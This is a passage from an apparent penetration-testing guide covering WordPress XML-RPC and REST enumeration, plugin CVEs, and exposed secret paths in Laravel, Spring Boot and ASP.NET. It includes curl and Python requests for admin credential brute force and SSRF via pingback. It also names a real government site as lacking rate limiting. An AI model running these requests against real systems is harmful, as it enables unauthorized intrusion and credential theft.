&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/xmlrpc.php&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: text/xml&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;system.listMethods&amp;lt;/methodName&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Credential brute force via wp.getUsersBlogs (UNLIMITED if no rate limit)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/xmlrpc.php&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: text/xml&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;wp.getUsersBlogs&amp;lt;/methodName&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;params&amp;gt;&amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;admin&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;PASSWORD&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;&amp;lt;/params&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SSRF via pingback.ping (reach internal network)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/xmlrpc.php&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: text/xml&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;pingback.ping&amp;lt;/methodName&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;params&amp;gt;&amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;http://INTERNAL_IP:PORT/&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;https://target.com/post&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;&amp;lt;/params&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Government transparency portal — XML-RPC active with 80 methods, no rate limiting.
&lt;code&gt;wp.getUsersBlogs&lt;/code&gt; allowed unlimited brute force to test admin credentials.&lt;/p&gt;
&lt;h4 id="xmlrpc-blocked-by-sso--how-to-identify" &gt;
&lt;div&gt;
&lt;a href="#xmlrpc-blocked-by-sso--how-to-identify"&gt;
###
&lt;/a&gt;
XMLRPC Blocked by SSO — How to Identify
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;When WordPress is behind a corporate SSO (SimpleSAMLphp, ADFS, etc.), XMLRPC may respond with HTML instead of XML:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Symptom: ALL auth attempts return HTML with login page&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Methods that do NOT require auth (system.listMethods, demo.sayHello, pingback.ping)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# still work and return normal XML!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# How to confirm:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Test method without auth (works → XMLRPC active)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Test method with auth (returns HTML login → SSO intercepting)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Check SSO redirect in response (Location header)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;xml &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;demo.sayHello&amp;lt;/methodName&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(&lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/xmlrpc.php&amp;#34;&lt;/span&gt;, data&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;xml,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;text/xml&amp;#39;&lt;/span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text) &lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;&amp;lt;methodResponse&amp;gt;&amp;lt;params&amp;gt;&amp;lt;param&amp;gt;...&amp;#34; → WORKS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;xml_auth &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;#39;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;wp.getUsersBlogs&amp;lt;/methodName&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;params&amp;gt;&amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;admin&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;lt;param&amp;gt;&amp;lt;value&amp;gt;&amp;lt;string&amp;gt;test&amp;lt;/string&amp;gt;&amp;lt;/value&amp;gt;&amp;lt;/param&amp;gt;&amp;lt;/params&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&amp;#39;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(&lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/xmlrpc.php&amp;#34;&lt;/span&gt;, data&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;xml_auth,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;text/xml&amp;#39;&lt;/span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;&amp;lt;!DOCTYPE html&amp;gt;&amp;lt;html&amp;gt;...&amp;#34; → SSO HTML! Auth intercepted&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Even when blocked, we can still:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Enumerate all 79+ methods (system.listMethods)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Test SSRF via pingback.ping (works without auth!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Identify WordPress version via system.getCapabilities&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: &lt;code&gt;mpf.gob.ar&lt;/code&gt; — 79 active XMLRPC methods. &lt;code&gt;demo.sayHello&lt;/code&gt; and &lt;code&gt;pingback.ping&lt;/code&gt; work without auth. &lt;code&gt;wp.getUsersBlogs&lt;/code&gt; returns SSO redirect. No rate limiting detected.&lt;/p&gt;
&lt;h3 id="73-rest-api-endpoints" &gt;
&lt;div&gt;
&lt;a href="#73-rest-api-endpoints"&gt;
##
&lt;/a&gt;
7.3 REST API Endpoints
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Exposed namespaces&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/&amp;#34;&lt;/span&gt; | jq &lt;span style="color:#a6d189"&gt;&amp;#39;.namespaces&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List pages&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/pages?per_page=100&amp;#34;&lt;/span&gt; | jq &lt;span style="color:#a6d189"&gt;&amp;#39;.[] | {id,slug,link}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List posts&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/posts?per_page=100&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List media (documents, PDFs)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/media?per_page=100&amp;#34;&lt;/span&gt; | jq &lt;span style="color:#a6d189"&gt;&amp;#39;.[] | {id,title:.title.rendered,url:.source_url}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Page revisions (full history)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/pages/{id}/revisions&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Custom post types&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/types&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Taxonomies&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/taxonomies&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="74-vulnerable-plugins-common-cves" &gt;
&lt;div&gt;
&lt;a href="#74-vulnerable-plugins-common-cves"&gt;
##
&lt;/a&gt;
7.4 Vulnerable Plugins (common CVEs)
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;WPDM (Download Manager) &amp;lt; 3.3.00 → CVE-2023-49753 SQLi
WPDM &amp;lt; 3.2.00 → CVE-2021-25069 unauthenticated download
WPDM &amp;lt; 3.2.10 → CVE-2021-34639 authenticated file upload
Contact Form 7 &amp;lt; 5.6 → file upload bypass
Yoast SEO → sitemaps, XML-RPC endpoints
WP Super Cache → exposed debug log
GSpeech → CVE-2025-10187 (old versions)
Revslider → dozens of file upload CVEs
Ninja Forms → file upload, XSS
Popup Maker → XSS, redirect
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="75-wordpress-attack-surface-map" &gt;
&lt;div&gt;
&lt;a href="#75-wordpress-attack-surface-map"&gt;
##
&lt;/a&gt;
7.5 WordPress Attack Surface Map
&lt;/div&gt;
&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;WordPress Attack Surface:
1. wp-login.php → Brute force, user enumeration
2. xmlrpc.php (if 200) → UNLIMITED brute force, SSRF
3. /wp-json/wp/v2/users → User enumeration
4. /wp-json/wp/v2/pages → Page content
5. /wp-json/wp/v2/media → Media and documents
6. /wp-json/wp/v2/pages/{id}/revisions → History (deleted data!)
7. /wp-json/wp-site-health/v1 → Diagnostic info
8. /wp-admin/admin-ajax.php → AJAX calls (sometimes without nonce)
9. /?author=1 → User ID enumeration
10. /wp-content/plugins/* → Plugin identification
11. /wp-content/uploads/* → Uploaded files
12. wp-comments-post.php → Comments (spam, XSS)
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="8-laravel-spring-boot-aspnet-exchange--other-frameworks" &gt;
&lt;div&gt;
&lt;a href="#8-laravel-spring-boot-aspnet-exchange--other-frameworks"&gt;
#
&lt;/a&gt;
8. LARAVEL, SPRING BOOT, ASP.NET, EXCHANGE &amp;amp; OTHER FRAMEWORKS
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="81-laravel--attack-surface" &gt;
&lt;div&gt;
&lt;a href="#81-laravel--attack-surface"&gt;
##
&lt;/a&gt;
8.1 Laravel — Attack Surface
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Environments&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/.env, /.env.example, /.env.production, /.env.local
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# OAuth keys (forge JWT if exposed)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/storage/oauth-private.key
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/storage/oauth-public.key
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Logs (tokens, queries, emails, stack traces)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/storage/logs/laravel.log
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/storage/logs/laravel-2026-*.log
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Debug (if APP_DEBUG=true)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Any 500 error returns the full stack trace with SQL queries&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Exposed Artisan commands&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/artisan
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Laravel Telescope (debug dashboard)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/telescope/requests, /telescope/exceptions, /telescope/queries
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Laravel Horizon (queue dashboard)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/horizon/dashboard
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Routes (in production, rarely exposed)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/routes
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# API docs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/docs, /api/documentation, /swagger
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: OVH server with Laravel — &lt;code&gt;.env&lt;/code&gt;, &lt;code&gt;.git/config&lt;/code&gt;, &lt;code&gt;storage/oauth-private.key&lt;/code&gt; all exposed in production (200 OK), exposing MySQL, SendGrid, cloud storage and Firebase credentials.&lt;/p&gt;
&lt;h3 id="82-spring-boot-java" &gt;
&lt;div&gt;
&lt;a href="#82-spring-boot-java"&gt;
##
&lt;/a&gt;
8.2 Spring Boot (Java)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Actuators — POWERFUL if exposed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/env → Environment variables &lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;DB, secrets!&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/health → Status
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/beans → Loaded beans
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/mappings → ALL application endpoints
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/heapdump → Heap download &lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;contains credentials in memory!&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/loggers → Logging configuration
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/metrics → Internal metrics
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/prometheus → Prometheus metrics
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Swagger/OpenAPI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/swagger-ui.html, /swagger-ui/index.html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/v2/api-docs, /v3/api-docs
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# H2 Console (RCE if exposed)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/h2-console
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Indicative header:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# X-Application-Context: application:prod:8080&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Health platform (Spring Boot) — Spring Boot in production with &lt;code&gt;X-Application-Context: application:prod:8080&lt;/code&gt;. Actuators listed but blocked by F5 BIG-IP. If F5 bypass → full access to &lt;code&gt;/actuator/env&lt;/code&gt; with database credentials.&lt;/p&gt;
&lt;h3 id="83-aspnet--iis" &gt;
&lt;div&gt;
&lt;a href="#83-aspnet--iis"&gt;
##
&lt;/a&gt;
8.3 ASP.NET / IIS
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Config files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/web.config, /web.config.bak
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Trace (if enabled)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/trace.axd
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
